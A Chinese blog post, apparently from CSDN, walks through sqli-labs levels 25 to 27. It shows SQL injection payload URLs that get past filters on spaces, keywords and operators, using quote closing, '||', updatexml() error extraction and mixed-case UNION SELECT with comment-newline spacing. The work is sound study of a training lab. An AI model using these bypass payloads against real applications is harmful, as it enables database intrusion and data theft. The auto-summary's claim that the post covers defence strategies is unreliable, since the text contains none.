mysql查询过滤%符号_小课堂 -- 绕过去除特殊字符的sql注入

本文介绍了如何在SQL注入攻击中绕过MySQL的特殊字符过滤,包括在sqli-labs的不同场景下,如Less-25、Less-26和Less-27,使用单引号闭合、逻辑运算符替代、XML函数结合数据库名获取等方法,展示了SQL注入的技巧和防御策略。
摘要由CSDN通过智能技术生成

环境sqli-labs

less 25

1、输入特殊字符,报错

http://192.168.1.121/sqli/Less-25/?id=1\

114547eb0003467f7f6fe0c9921f52b2.png

2、单引号闭合

86034021627bcb8a310c7cbd928ff726.png

3、输入and、or都会被过滤,报错,输入||正常,所以可以判断是大小写过滤

http://192.168.1.121/sqli/Less-25/?id=1' and 1=1 --+

http://192.168.1.121/sqli/Less-25/?id=1' or 1=1 --+

d4871229c849c59947cb5ff518aec2f2.png

http://192.168.1.121/sqli/Less-25/?id=1' || 1=1 --+

92ad5da3efda74f5dc811673162257e9.png

less 26

一、输入特殊字符,看报错信息

http://192.168.1.121/sqli/Less-26/?id=1'

aabbd67aa1404a8547c846ed39794bc3.png

二、闭合语句没有效果,屏蔽了-,空格,or等等

http://192.168.1.121/sqli/Less-26/?id=1' --+

三、重新构造闭合语句

http://192.168.1.121/sqli/Less-26/?id=1' ||'a'='a

3ec84d6e5e14c2e557a775f59fe497f0.png

这样就绕过了去空格

四、获取数据库名称

http://192.168.1.121/sqli/Less-26/?id=1'||updatexml(1,concat('$',(database())),0)||'1'='1

a40fc9a42dea2751bb05a84468ba6274.png

less 27

一、输入特殊字符,报错

http://192.168.1.121/sqli/Less-27/?id=1'

8c3b75c37843a0fc5fc766255e0b104b.png

二、由于过滤了特殊符号,构造如下闭合语句

http://192.168.1.121/sqli/Less-27/?id=1' ||'1

32182875dead75f392d1bd80ff030cf0.png

三、通过union查询

http://192.168.1.121/sqli/Less-27/?id=1' union select 1,2,3 ||'1

8dffb2bdbdf37caf3c12eae40b01c56e.png

union、select屏蔽了,空格也屏蔽了

四、union.select大小写替换一下,空格用/*%0a*/替换

http://192.168.1.121/sqli/Less-27/?id=0'/*%0a*/uniOn/*%0a*/seLect/*%0a*/1,2,3%20||'1

36d29bf04e8fd6c01b6c4812df31cd3e.png

五、获取数据库名称

http://192.168.1.121/sqli/Less-27/?id=0'/*%0a*/uniOn/*%0a*/seLect/*%0a*/1,database(),3||'1

5907758e8b20925932f3eaa27a1b743b.png

禁止非法,后果自负

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值